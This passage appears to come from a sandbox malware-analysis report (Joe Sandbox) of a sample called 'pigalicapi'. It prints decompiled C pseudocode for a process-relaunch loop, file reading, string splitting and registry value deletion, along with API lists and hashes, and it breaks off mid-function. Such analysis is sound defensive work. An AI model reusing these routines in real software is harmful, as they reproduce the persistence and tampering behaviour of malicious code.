                                                                                                                                                                                                                                                                                                        • API String ID: 2461998243-509482549
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8ec94040c610515bec2416d0adaa2c3baf4629c9f06ab549dac859a33765003e
                                                                                                                                                                                                                                                                                                        • Instruction ID: e85ddbd10a1709dc64db389d43dfdca03f0125780d47bd1fb79a5389fcfd3c42
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ec94040c610515bec2416d0adaa2c3baf4629c9f06ab549dac859a33765003e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A6118B0508304DFE710EF28D99875E7BE4EB44304F50892EE899DB3A1D379D9859B8B
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                                        			E024E77B0(void** _a4) {
                                                                                                                                                                                                                                                                                                        				void** _v8;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                                                                                                                                        				long _v20;
                                                                                                                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                                                                                                                        				void** _v28;
                                                                                                                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                                                                                                                        				void* _t60;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                                        					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                                                        					_v12 = 0x96;
                                                                                                                                                                                                                                                                                                        					_v16 = 0x1388;
                                                                                                                                                                                                                                                                                                        					_v8 = _a4;
                                                                                                                                                                                                                                                                                                        					if( *_v8 != 0) {
                                                                                                                                                                                                                                                                                                        						_v20 = 0;
                                                                                                                                                                                                                                                                                                        						while(_v20 < 0x96) {
                                                                                                                                                                                                                                                                                                        							_v24 = 0;
                                                                                                                                                                                                                                                                                                        							_t37 = GetExitCodeProcess(_v8[3],  &_v24); // executed
                                                                                                                                                                                                                                                                                                        							if(_t37 == 0) {
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								if(_v24 != 0x103) {
                                                                                                                                                                                                                                                                                                        									CloseHandle(_v8[3]);
                                                                                                                                                                                                                                                                                                        									Sleep(0x7530);
                                                                                                                                                                                                                                                                                                        									_t40 = E024E2070( *_v8);
                                                                                                                                                                                                                                                                                                        									_t60 = _t60 + 4;
                                                                                                                                                                                                                                                                                                        									_v8[3] = _t40;
                                                                                                                                                                                                                                                                                                        									if(_v8[3] != 0) {
                                                                                                                                                                                                                                                                                                        										_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                                                        										if((_v8[2] & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                        											E024E2510(_v8[3], 0x24ee290);
                                                                                                                                                                                                                                                                                                        											_t60 = _t60 + 8;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										goto L11;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                                                        									L11:
                                                                                                                                                                                                                                                                                                        									continue;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							break;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						VirtualFree( *_v8, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        						_v28 = _v8;
                                                                                                                                                                                                                                                                                                        						E024E97C0(_v28);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                                                                        			}












                                                                                                                                                                                                                                                                                                        0x024e77ba
                                                                                                                                                                                                                                                                                                        0x024e77c2
                                                                                                                                                                                                                                                                                                        0x024e77c8
                                                                                                                                                                                                                                                                                                        0x024e77cf
                                                                                                                                                                                                                                                                                                        0x024e77d9
                                                                                                                                                                                                                                                                                                        0x024e77e2
                                                                                                                                                                                                                                                                                                        0x024e77e8
                                                                                                                                                                                                                                                                                                        0x024e77ef
                                                                                                                                                                                                                                                                                                        0x024e77fc
                                                                                                                                                                                                                                                                                                        0x024e780e
                                                                                                                                                                                                                                                                                                        0x024e7816
                                                                                                                                                                                                                                                                                                        0x024e7818
                                                                                                                                                                                                                                                                                                        0x024e781f
                                                                                                                                                                                                                                                                                                        0x024e7835
                                                                                                                                                                                                                                                                                                        0x024e7840
                                                                                                                                                                                                                                                                                                        0x024e784c
                                                                                                                                                                                                                                                                                                        0x024e7851
                                                                                                                                                                                                                                                                                                        0x024e7857
                                                                                                                                                                                                                                                                                                        0x024e7861
                                                                                                                                                                                                                                                                                                        0x024e786d
                                                                                                                                                                                                                                                                                                        0x024e7879
                                                                                                                                                                                                                                                                                                        0x024e7887
                                                                                                                                                                                                                                                                                                        0x024e788c
                                                                                                                                                                                                                                                                                                        0x024e788c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e7863
                                                                                                                                                                                                                                                                                                        0x024e7821
                                                                                                                                                                                                                                                                                                        0x024e7826
                                                                                                                                                                                                                                                                                                        0x024e788f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e7893
                                                                                                                                                                                                                                                                                                        0x024e781f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e7816
                                                                                                                                                                                                                                                                                                        0x024e78a5
                                                                                                                                                                                                                                                                                                        0x024e78ae
                                                                                                                                                                                                                                                                                                        0x024e78b5
                                                                                                                                                                                                                                                                                                        0x024e78ba
                                                                                                                                                                                                                                                                                                        0x024e78bd
                                                                                                                                                                                                                                                                                                        0x024e78bd
                                                                                                                                                                                                                                                                                                        0x024e78c8

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 024E77C2
                                                                                                                                                                                                                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 024E780E
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00001388), ref: 024E7826
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00001388), ref: 024E7835
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00007530), ref: 024E7840
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000096,00000000,00008000), ref: 024E78A5
                                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 024E78BD
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Sleep$CloseCodeExitFreeHandleInitializeProcessUninitializeVirtual
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2326833528-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b236fe85807dc6c74fe6c3add8855abe8abcb34b864d697d7e5aebc6b33179af
                                                                                                                                                                                                                                                                                                        • Instruction ID: 562c16d4a7ff598467d10f7099736a88ac51943d50f28bd35f37b22c7482388e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b236fe85807dc6c74fe6c3add8855abe8abcb34b864d697d7e5aebc6b33179af
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8315C74D00209EBFF04CFD4D984BAEB7B1BB58316F10859AE416AB381D7759A41CF91
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E5CD0(CHAR* _a4) {
                                                                                                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && lstrlenA(_a4) >= 4) {
                                                                                                                                                                                                                                                                                                        					_t29 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                                                        					_v12 = _t29;
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                                                                        						_v16 = GetFileSize(_v12, 0);
                                                                                                                                                                                                                                                                                                        						if(_v16 > 0) {
                                                                                                                                                                                                                                                                                                        							_t34 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        							_v20 = _t34;
                                                                                                                                                                                                                                                                                                        							if(_v20 != 0) {
                                                                                                                                                                                                                                                                                                        								_v24 = 0;
                                                                                                                                                                                                                                                                                                        								ReadFile(_v12, _v20, _v16,  &_v24, 0); // executed
                                                                                                                                                                                                                                                                                                        								if(_v24 == _v16) {
                                                                                                                                                                                                                                                                                                        									_v8 = E024E16F0(_v20, _v16);
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						FindCloseChangeNotification(_v12); // executed
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}










                                                                                                                                                                                                                                                                                                        0x024e5cd6
                                                                                                                                                                                                                                                                                                        0x024e5ce1
                                                                                                                                                                                                                                                                                                        0x024e5d10
                                                                                                                                                                                                                                                                                                        0x024e5d16
                                                                                                                                                                                                                                                                                                        0x024e5d1d
                                                                                                                                                                                                                                                                                                        0x024e5d2f
                                                                                                                                                                                                                                                                                                        0x024e5d36
                                                                                                                                                                                                                                                                                                        0x024e5d45
                                                                                                                                                                                                                                                                                                        0x024e5d4b
                                                                                                                                                                                                                                                                                                        0x024e5d52
                                                                                                                                                                                                                                                                                                        0x024e5d54
                                                                                                                                                                                                                                                                                                        0x024e5d6d
                                                                                                                                                                                                                                                                                                        0x024e5d79
                                                                                                                                                                                                                                                                                                        0x024e5d8b
                                                                                                                                                                                                                                                                                                        0x024e5d8b
                                                                                                                                                                                                                                                                                                        0x024e5d99
                                                                                                                                                                                                                                                                                                        0x024e5d99
                                                                                                                                                                                                                                                                                                        0x024e5d52
                                                                                                                                                                                                                                                                                                        0x024e5da3
                                                                                                                                                                                                                                                                                                        0x024e5da3
                                                                                                                                                                                                                                                                                                        0x024e5d1d
                                                                                                                                                                                                                                                                                                        0x024e5daf

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 024E5CEB
                                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024E5D10
                                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(000000FF,00000000), ref: 024E5D29
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E5D45
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 024E5D6D
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E5D99
                                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(000000FF), ref: 024E5DA3
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$Virtual$AllocChangeCloseCreateFindFreeNotificationReadSizelstrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 443218420-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 961ca06a1fd4ee28c6d628d37122f0dac2662f5299c2497f59e59df4c74cca4a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7abee207d3ce412a139c8d6b99f328abf756c9f6998c0a9d24819d697359bcf8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 961ca06a1fd4ee28c6d628d37122f0dac2662f5299c2497f59e59df4c74cca4a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E21EC75E40208FBEF14DFE4D889FAEB775AB48705F108549E615AB2C1C7749A40CF50
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E5B50(CHAR* _a4, char* _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                                                                                                                        				long _v20;
                                                                                                                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                                                                                                                        				int _v32;
                                                                                                                                                                                                                                                                                                        				char* _v36;
                                                                                                                                                                                                                                                                                                        				char* _v40;
                                                                                                                                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                                                                                                                                        				void* _t69;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                                                        					_v32 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                                                        					_v28 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                                                        					_v24 = 0;
                                                                                                                                                                                                                                                                                                        					_v16 = 0;
                                                                                                                                                                                                                                                                                                        					while(_v24 < _v28) {
                                                                                                                                                                                                                                                                                                        						_v36 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                                                        						if(_v36 != 0) {
                                                                                                                                                                                                                                                                                                        							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                                        							_v24 = _v36 - _a4 + _v32;
                                                                                                                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						break;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v20 = _v16 * 0x28;
                                                                                                                                                                                                                                                                                                        					_t69 = VirtualAlloc(0, _v20, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        					_v12 = _t69;
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_v24 = 0;
                                                                                                                                                                                                                                                                                                        						_v16 = 0;
                                                                                                                                                                                                                                                                                                        						while(_v24 < _v28) {
                                                                                                                                                                                                                                                                                                        							_v40 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                                                        							if(_v40 != 0) {
                                                                                                                                                                                                                                                                                                        								lstrcpynA(_v12 + _v16 * 0x28,  &(_a4[_v24]), _v40 -  &(_a4[_v24]) + 1);
                                                                                                                                                                                                                                                                                                        								_v24 = _v40 - _a4 + _v32;
                                                                                                                                                                                                                                                                                                        								_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                                        								_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                                        								 *_a12 = _v12;
                                                                                                                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							break;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(_a16 != 0) {
                                                                                                                                                                                                                                                                                                        							_v44 = VirtualAlloc(0, _v20, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        							if(_v44 != 0) {
                                                                                                                                                                                                                                                                                                        								E024E7B70(_v44, _v12, _v20);
                                                                                                                                                                                                                                                                                                        								 *_a16 = _v44;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}














                                                                                                                                                                                                                                                                                                        0x024e5b56
                                                                                                                                                                                                                                                                                                        0x024e5b61
                                                                                                                                                                                                                                                                                                        0x024e5b85
                                                                                                                                                                                                                                                                                                        0x024e5b92
                                                                                                                                                                                                                                                                                                        0x024e5b95
                                                                                                                                                                                                                                                                                                        0x024e5b9c
                                                                                                                                                                                                                                                                                                        0x024e5ba3
                                                                                                                                                                                                                                                                                                        0x024e5bbc
                                                                                                                                                                                                                                                                                                        0x024e5bc3
                                                                                                                                                                                                                                                                                                        0x024e5bcb
                                                                                                                                                                                                                                                                                                        0x024e5bd7
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e5bde
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e5bc3
                                                                                                                                                                                                                                                                                                        0x024e5be6
                                                                                                                                                                                                                                                                                                        0x024e5bf6
                                                                                                                                                                                                                                                                                                        0x024e5bfc
                                                                                                                                                                                                                                                                                                        0x024e5c03
                                                                                                                                                                                                                                                                                                        0x024e5c09
                                                                                                                                                                                                                                                                                                        0x024e5c10
                                                                                                                                                                                                                                                                                                        0x024e5c17
                                                                                                                                                                                                                                                                                                        0x024e5c30
                                                                                                                                                                                                                                                                                                        0x024e5c37
                                                                                                                                                                                                                                                                                                        0x024e5c59
                                                                                                                                                                                                                                                                                                        0x024e5c68
                                                                                                                                                                                                                                                                                                        0x024e5c71
                                                                                                                                                                                                                                                                                                        0x024e5c7a
                                                                                                                                                                                                                                                                                                        0x024e5c87
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e5c87
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e5c37
                                                                                                                                                                                                                                                                                                        0x024e5c8f
                                                                                                                                                                                                                                                                                                        0x024e5ca4
                                                                                                                                                                                                                                                                                                        0x024e5cab
                                                                                                                                                                                                                                                                                                        0x024e5cb9
                                                                                                                                                                                                                                                                                                        0x024e5cc7
                                                                                                                                                                                                                                                                                                        0x024e5cc7
                                                                                                                                                                                                                                                                                                        0x024e5cab
                                                                                                                                                                                                                                                                                                        0x024e5c8f
                                                                                                                                                                                                                                                                                                        0x024e5c03
                                                                                                                                                                                                                                                                                                        0x024e5ccf

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 024E5B7F
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 024E5B8C
                                                                                                                                                                                                                                                                                                        • StrStrIA.SHLWAPI(00000000,00000000), ref: 024E5BB6
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E5BF6
                                                                                                                                                                                                                                                                                                        • StrStrIA.SHLWAPI(00000000,00000000), ref: 024E5C2A
                                                                                                                                                                                                                                                                                                        • lstrcpynA.KERNEL32(00000000,00000000,-00000001), ref: 024E5C59
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E5C9E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocVirtuallstrlen$lstrcpyn
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 808621155-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: f9f87b7b0a5115113eea2681a4aac114e2b605819b7fc69a9ce76428be69d4ae
                                                                                                                                                                                                                                                                                                        • Instruction ID: 65b4e075ef6a2bc7bdf16286d7535b14676f65e4a91294fa701fabaf0723be8b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9f87b7b0a5115113eea2681a4aac114e2b605819b7fc69a9ce76428be69d4ae
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A51B775D00209EFEF04CF94C594BAEBBB5AF48309F14855AE506AB344C375AA81CFA5
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E6CF0() {
                                                                                                                                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				int _v20;
                                                                                                                                                                                                                                                                                                        				int _v24;
                                                                                                                                                                                                                                                                                                        				long _v28;
                                                                                                                                                                                                                                                                                                        				char _v60;
                                                                                                                                                                                                                                                                                                        				long _t21;
                                                                                                                                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                                                                                                                                        				char* _t26;
                                                                                                                                                                                                                                                                                                        				char* _t30;
                                                                                                                                                                                                                                                                                                        				char* _t32;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                                                                                                                                        				_v12 = 0x80000001;
                                                                                                                                                                                                                                                                                                        				if(( *0x24f435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        					_v12 = 0x80000002;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                                                                                                                                        				_t32 =  *0x24f18a0; // 0x24f3b88
                                                                                                                                                                                                                                                                                                        				_t21 = RegOpenKeyExA(_v12, _t32, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                                                        				if(_t21 == 0) {
                                                                                                                                                                                                                                                                                                        					_v24 = 0x20;
                                                                                                                                                                                                                                                                                                        					_v20 = 3;
                                                                                                                                                                                                                                                                                                        					_t30 =  *0x24f1890; // 0x24f3fa6
                                                                                                                                                                                                                                                                                                        					_t24 = RegQueryValueExA(_v16, _t30, 0,  &_v20,  &_v60,  &_v24); // executed
                                                                                                                                                                                                                                                                                                        					_v28 = _t24;
                                                                                                                                                                                                                                                                                                        					if(_v28 == 0) {
                                                                                                                                                                                                                                                                                                        						_v5 = 1;
                                                                                                                                                                                                                                                                                                        						_t26 =  *0x24f1890; // 0x24f3fa6
                                                                                                                                                                                                                                                                                                        						RegDeleteValueA(_v16, _t26);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					RegCloseKey(_v16);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                                                                                                                                        			}















                                                                                                                                                                                                                                                                                                        0x024e6cf6
                                                                                                                                                                                                                                                                                                        0x024e6cfa
                                                                                                                                                                                                                                                                                                        0x024e6d0a
                                                                                                                                                                                                                                                                                                        0x024e6d0c
                                                                                                                                                                                                                                                                                                        0x024e6d0c
                                                                                                                                                                                                                                                                                                        0x024e6d13
                                                                                                                                                                                                                                                                                                        0x024e6d25
                                                                                                                                                                                                                                                                                                        0x024e6d30
                                                                                                                                                                                                                                                                                                        0x024e6d38
                                                                                                                                                                                                                                                                                                        0x024e6d3a
                                                                                                                                                                                                                                                                                                        0x024e6d41
                                                                                                                                                                                                                                                                                                        0x024e6d56
                                                                                                                                                                                                                                                                                                        0x024e6d61
                                                                                                                                                                                                                                                                                                        0x024e6d67
                                                                                                                                                                                                                                                                                                        0x024e6d6e
                                                                                                                                                                                                                                                                                                        0x024e6d70
                                                                                                                                                                                                                                                                                                        0x024e6d74
                                                                                                                                                                                                                                                                                                        0x024e6d7e
                                                                                                                                                                                                                                                                                                        0x024e6d7e
                                                                                                                                                                                                                                                                                                        0x024e6d88
                                                                                                                                                                                                                                                                                                        0x024e6d88
                                                                                                                                                                                                                                                                                                        0x024e6d94

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,024F3B88,00000000,000F003F,00000000), ref: 024E6D30
                                                                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,024F3FA6,00000000,00000003,?,00000020), ref: 024E6D61
                                                                                                                                                                                                                                                                                                        • RegDeleteValueA.ADVAPI32(00000000,024F3FA6), ref: 024E6D7E
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 024E6D88
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 647993726-3916222277
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2febf2621d4657ba6ac14d690b2f52a0e6f01affb2ad4bdd81366166c8cb26fa
                                                                                                                                                                                                                                                                                                        • Instruction ID: 29800b78a04dcde9afe026b7e7d235db51e0e54c9053a4636f57ba93edb2c010
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2febf2621d4657ba6ac14d690b2f52a0e6f01affb2ad4bdd81366166c8cb26fa
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8113AB5D40209EFEF04DFE4D888BBFBBB8AB48704F148549E615AB241D7B59614CFA0
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E8370(intOrPtr _a4, long _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				long _v20;
                                                                                                                                                                                                                                                                                                        				long _v24;
